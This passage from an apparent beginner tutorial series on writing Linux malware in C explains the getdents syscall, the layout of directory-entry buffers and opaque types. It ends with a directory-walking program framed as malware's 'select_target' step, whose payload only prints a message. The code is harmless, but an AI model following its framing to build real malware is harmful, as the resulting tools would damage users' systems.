303 | Anyhow, malware is usually target specific (platform-wise) and getting rid of the standard libc will make our program very small and give us much more control on what is in it and what is not.
304 | 
305 | So, the system call that we have to use is known as `getdents`. Sure, you got it, it stands for _GET Directory ENTries_. There is a man page for it and it says that there is no wrapper provided by libc, so we have to write our own if we want to use it (the man page already says how to do that):
306 | 
307 | 
308 | ```C
309 | #include <sys/syscall.h>
310 | 
311 | int getdents (int fd, char *buf, int len)
312 | { return syscall (SYS_getdents, fd, buf, len); }
313 | ```
314 | 
315 | We will not go all the way down to the kernel right now. We implement it using the `syscall` standard function instead of invoking the `syscall` processor instruction directly so we can still use C code and we do not need to start adding assembler at this point. We will get to that a bit later.
316 | 
317 | In order to use this function, we need a file descriptor for the directory. We can get this using the standard `open` system call. This will do the trick:
318 | 
319 | ```C
320 | int select_target (PAYLOAD_FUNC pf) {
321 |   char                buf[BUF_SIZE];
322 |   struct linux_dirent *de;
323 |   int                 fd, n, i;
324 |   
325 |   // Open directory using open
326 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) exit (1);
327 | 
328 |   while (1) {
329 |     // Read directory entries
330 |     }
331 |   }
332 |   close (fd);
333 |   return 0;
334 | ```
335 | 
336 | At this level, we manage the directory exactly the same than a file. We `open` it... and we `close` it whenever we are done. Now is time to see how to use `getdents`.
337 | 
338 | ## Using `getdents`
339 | The `getdents` prototype is as follows:
340 | 
341 |     int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count);
342 | 
343 | It receives as parameters a file descriptor (the one we got from the call to `open` with flag `O_DIRECTORY`), then a pointer to the `struct linux_dirent` (actually an pseudo-array of items of this type) and finally the size of the buffer we pass as parameter in the second parameter. You will understand this in a second.
344 | 
345 | As you can see the second parameter is of type `struct linux_dirent` instead of the `struct_dirent` that we used with the POSIX version. These structures are slightly different, but we can get them from the man pages of the `readdir` function and `getdents` system call respectively. Anyway we had already introduced it previously when we talked about `structs .
346 | 
347 | So, how does `getdents` works?. It doesn't return just one directory entry... it returns as many as will fit in the buffer we pass as second parameter, and that number will vary depending on..... Yes sure, on the length of the name of each entry. So the return value (the number of bytes read) is important in order to extract the information.
348 | 
349 | The man page also include example code on how to use the system call. I will include here a simplified version to explain how does this syscall work:
350 | 
351 | ```C
352 |   char                buf[BUF_SIZE];
353 |   struct linux_dirent *de;
354 |   int                 fd, n, i;
355 | (...)
356 |   while (1) {
357 |     n = getdents (fd, buf, BUF_SIZE);
358 |     if (n < 0) exit (1);
359 |     if (n == 0) break;
360 | 
361 |     // Build file name
362 |     for (i = 0; i < n;) {
363 |       de = (struct linux_dirent *)(buf + i);
364 |       
365 | 	pf (de->d_name);
366 |     i += de->d_reclen;
367 |   }
368 | ```
369 | 
370 | 
371 | First we call the syscall and process errors and end condition. And after that we have to process all the entries reported by the syscall...and we do not know how many are there. That number will depend on the size of the buffer we pass to the syscall. So we run our loop over bytes and not over `struct linux_dirent` items because we do not know the size of each entry in the array (actually this is why it is not really an array). 
372 | 
373 | The variable `n` contains the number of bytes read by `getdents`.
374 | 
375 | The first entry will be at offset zero of our buffer. We access it casting our general buffer to the structure, do what we want to do and then we increase the offset by the size of the directory entry that is stored in the field `reclen`. This will update the offset in the buffer to point to the next entry and we repeat the process.
376 | 
377 | >NOTE: Casting a pointer is just forcing it into some type. This only make sense for the compiler. In reality, the memory is the same, regardless the cast operation we apply. Casting will allow us to tweak our view of a given memory block. Imaging our memory block is 16 bytes. We can see it as 16 `unsigned chars`, 8 `shorts`, 4 `ints`, 2 `longs` or 1 `longlong`. The memory block will have the same content but in our program the values that will get after casting will be different.
378 | > 
379 | > Example: 
380 | > A 8 bytes memory block at address ADDR contains.
381 | >
382 | >     addr =  | 0x00 | 0x01 | 0x02 | 0x03 | 0x04 | 0x05 | 0x06 | 0x07 | 
383 | >```C
384 | > long *l = (long *) addr; // l[0] or *l will be 0x0001020304050607
385 | > int  *i = (int  *) addr; // i[0] or *i will be 0x00010203 and i[1] or *(i+1) = 0x04050607
386 | > char *c = (char *) addr; // c[0] = 0x00, c[1]= 0x01, .... c[7] = 0x07
387 | > ```
388 | 
389 | Let's see this with an example. Imagine a folder containing just a file named `a.txt`. This is what `getdents` will return in the buffer:
390 | 
391 |     buf+64     -> | inode
392 |                   +-------------- 
393 |     buf+59     -> | a.txt\0
394 |     buf+57     -> | 24
395 |     buf+49     -> | offset
396 |     buf+41     -> | inode
397 |                   +--------------
398 |     buf+38     -> | ..\0
399 |     buf+36     -> | 21 
400 |     buf+28     -> | offset
401 |     buf+20     -> | inode  <----------+-- addr + 20
402 |                   +--------------     |           ^
403 |     buf+18     -> | .\0               |           |
404 |     buf+16     -> | 20     -----------+-----------+
405 |     buf+8      -> | offset            |
406 |     buf       --> | inode  <----------+--- addr
407 |                   +--------------
408 | 
409 | _NOTE: According to the man page, the offset is the distance from the start of the directory to the next dirent struct, however after printing the values I get on my test program those number look strange. I may need to double check, but may be related to the actual EXT3 filesystem that stores the directories as linked lists. For the time being we can use `reclen` to deal with the buffer returned by `getdents`, and ignore `d_off`_
410 | 
411 | As you can see we always get the current (`.`) and the parent ( `..`) directories and then the rest of files. In this case we only have an extra file and our 1024 bytes buffer will be mostly empty after reading the whole folder. A directory containing many files may fill the buffer completely and we may need to call `getdents` again to keep reading the directory.
412 | 
413 | # Opaque data types. The `DIR` struct
414 | 
415 | Now we could figure out what is in the `DIR` type we used with the POSIX interface. It is not that we need that, but figuring out this kind of things will boost your learning... so it is up to you to skip this section or not. 
416 | 
417 | The `DIR` type is a so-called opaque data type in the sense that the programmer (that is us) cannot see what is in it. Compare this to the `struct dirent` we have been used in our examples, where we can see the different fields and we actually need to use them.
418 | 
419 | Opaque data types are used together with an API that does what we need so we do not need to access the structure directly. This has the advantage that new versions of the SW may change the internal structure of the data type and, as far as the API doesn't change our program will still work. This concept is known generically as _Encapsulation_.
420 | 
421 | Making a structure opaque is just a matter of not exposing the internal structure. That's means, the structure is not defined in the .h files available to the programmer. We will see how to do this later. For the time being this is not relevant.
422 | 
423 | So, with all the information we have, and after learning how to use the POSIX API we can figure out what is in this `DIR` data type and also how to implement the different functions. The structure would be more or less like:
424 | 
425 | ```C
426 | typedef struct __my_dirstream {
427 | 	int      fd;             // File descriptor returned by open. Required by getdent
428 | 	char     buf[BUF_SIZE];  // Buffer to read directory entries (to call getdent)
429 | 	int      n;              // Number of bytes to process
430 | 	int      off;            // Number of bytes already processed
431 | } MY_DIR;
432 | ```
433 | 
434 | I will leave as exercise to the reader the implementation of the POSIX interface using `open/getdents/close`. It is a nice exercise to get more fluent with the C programming language. Just do it, it is pretty straightforward with all the information we have learnt so far and will help you to get comfortable with C... you may need to add more fields to the structure above depending on how do you implement the API.
435 | 
436 | # The final version
437 | Just for your convenience this is the final complete version of our directory listing program:
438 | 
439 | ```C
440 | #define _GNU_SOURCE  // Needed by syscall
441 | #include <stdio.h>
442 | #include <stdlib.h>
443 | #include <string.h>
444 | 
445 | #include <unistd.h>
446 | #include <fcntl.h>
447 | #include <sys/types.h>  
448 | #include <sys/stat.h>   // Stat systemcall
449 | 
450 | #include <sys/syscall.h>
451 | 
452 | #define BUF_SIZE 1024
453 | 
454 | #define MFW_EXIT(s) do {perror (s); exit (EXIT_FAILURE);} while (0)
455 | 
456 | // Dirent Data struct
457 | struct linux_dirent {
458 |   long           d_ino;
459 |   off_t          d_off;
460 |   unsigned short d_reclen;
461 |   char           d_name[];
462 | };
463 | 
464 | 
465 | char folder[1024];
466 | 
467 | // getdent wrapper. Not provided by glibc
468 | int getdents (int fd, char *buf, int len)
469 | { return syscall (SYS_getdents, fd, buf, len); }
470 | 
471 | typedef int (*PAYLOAD_FUNC)(char *);
472 | 
473 | int payload (char *target) {
474 |   printf ("Doing malware things to %s\n", target);
475 | }
476 | 
477 | int select_target (PAYLOAD_FUNC pf) {
478 |   char                buf[BUF_SIZE];
479 |   struct linux_dirent *de;
480 |   struct stat         st;
481 |   int                 fd, n, i;
482 |   
483 |   // Open directory using open
484 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
485 | 
486 |   while (1) {
487 |     n = getdents (fd, buf, BUF_SIZE);
488 |     if (n < 0) MFW_EXIT ("getdents:");
489 |     if (n == 0) break;
490 | 
491 |     for (i = 0; i < n;) {
492 |       de = (struct linux_dirent *)(buf + i);
493 | 	  pf (de->d_name);
494 |       i += de->d_reclen;
495 |     }
496 |   }
497 |   close (fd);
498 |   return 0;
499 | }
500 | 
501 | int main (int argc, char *argv[]) {
502 |   strcpy (folder, argv[1]);
503 |   while (select_target(payload));
504 | }
505 | 
506 | ```
507 | 
508 | It has some minor changes and all the required includes and defines. I would recommend to go through it and try to understand the stuff that is not described in this text. Do not hesitate to ask in the comments if you do not understand something.
509 | 
510 | # Conclusions
511 | 
512 | We have learnt how to read a directory using the standard POSIX interface and also using system calls. We have also learnt about function pointers and `structs`. A lot of stuff to digest. I know.
513 | 
514 | This is the first step to implement the `select_target` function. The second one is to be able to determine the details of each file in the directory and thus select the target needed by each specific malware. This is what we will deal with in the next instalment.
515 | 
516 | Note that these articles are intended for newbies, so be free to ask in the comments about any doubt. There is no stupid question when you are starting so do not be shy, I'll try to answer all of your doubts and I'm also interested on knowing if the level of the text is too easy or too hard, so your feedback will be pretty much appreciated. 
517 | 
518 | However I would recommend to first try to answer your question by yourself, using Google, and rechecking the previous instalments. It is not just bad [nettiquette ](https://en.wikipedia.org/wiki/Etiquette_in_technology) it is also way better for you to learn. The things you learn by yourself remind steady in your memory and broads your view of the topic.
519 | 


--------------------------------------------------------------------------------